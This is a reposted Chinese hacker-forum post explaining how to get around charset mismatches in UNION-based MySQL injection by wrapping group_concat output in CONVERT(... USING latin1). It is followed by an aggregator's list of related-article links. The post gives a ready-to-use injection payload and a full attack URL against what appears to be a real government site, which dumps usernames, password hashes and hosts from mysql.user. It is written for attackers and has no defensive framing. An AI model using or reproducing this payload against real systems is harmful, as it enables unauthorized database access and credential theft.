再谈联合查询注入字段间编码不同无法显示内容问题
2013-04-19 12:55
441 查看
| 作者:小D 来自:Silic Group Hacker Army 转载请注明:http://blackbap.org 首先我们来看这样的一个文章:简单搞定联合查询注入字段间编码不同无法显示内容问题 http://bbs.blackbap.org/thread-1646-1-1.html 这种EUC日本语言的网站用hex无可非议,但是如果遇到utf-8编码和lang=en啊西欧啊什么的不兼容,这样hex来unhex去的,相当麻烦。其实在俄罗斯黑客那里还有个更简单的方法。当然,函数还是函数,函数都是MySQL的,要看你怎么用了。 函数名称:convert() 作用:转换编码格式 在MySQL的编码格式中,有这么几种:gb2312和utf-8(当然还有,国内基本没有用的),还有一个默认的Latin1 如果显示位能显示数字,却无法显示user()(判断编码不同这个问题我就不重复了。。。),就可能是编码不同。这个时候用convert转换成latin1显示就行了。用法例如: CONVERT(group_concat(DISTINCT+user,0x3a,password,0x3a,host)+USING+latin1) 复制代码 就这么简单。至于例子,自己找吧。convert也不是个难记的函数。转载请注明:http://blackbap.org 补充一个最痛快的例子,就是Mr.Cool原文章中的: http://www.gov.ai/vacancies/details.php?id=-1+UNION+SELECT+1,2,3,4,5,6,CONVERT(group_concat(DISTINCT+user,0x3a,password,0x3a,host)+USING+latin1)+from+mysql.user/* 复制代码 |
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- [实例] 简单搞定联合查询注入字段间编码不同无法显示内容问题
- 解决pl/sql developer 中文字段显示乱码或无法用中文作查询条件的问题
- 创建HTML文件保存由于编码问题导致内容无法显示的处理办法
- oracle 定长字段查询问题 ,ibatis 与pl/sql查询的char类型字段查询不同
- 关于jquery操作iframe中内容, 无法正常显示的问题
- layui弹出框打开第二次select内容无法显示问题
- 在 windows7 中无法显示 chm 文件内容的问题【解决办法】
- 在使用Hibernate时,因为一个查询需要更多的表连接而要使用SQL来解决性能问题。然而返回的结果集中包含了没有映射的Entity类中的表字段,在这个SQL中还有使用如何将层次关系的父子结点显示为横行
- 解决下载的chm无法显示内容的问题
- 最终解决Mybatis多表联合查询中字段名重复导致的各路问题
- 验证码无法显示与函数文件编码问题
- oracle 定长字段查询问题 ,ibatis 与pl/sql查询的char类型字段查询不同
- Asp.net中解决母版页CSS样式无法在内容页完整显示——问题
- ISA发布MOSS网站内容查询WEB部件不能显示问题?
- 如何根据字节流内容确定汉字编码,从而解决相同App在部分省份显示乱码的问题
- IOS URL无法对加号进行编码导致http请求时服务器端获取的内容中加号变成空格问题
- oracle 定长字段查询问题 ,ibatis 与pl/sql查询的char类型字段查询不同
- mysql导入导出数据中文乱码解决方法小结(1、navicat导入问题已解决,创建连接后修改连接属性,选择高级->将使用Mysql字符集复选框去掉,下拉框选择GBK->导入sql文件OK;2、phpmyadmin显示乱码的问题也解决,两步:1.将sql文件以utf8的字符集编码另存,2.将文件中sql语句中的字段字符集编码改成utf8,导入OK)
- java setVisible顺序不同导致窗体内容不显示问题
- 根据字段内容来显示不同的内容: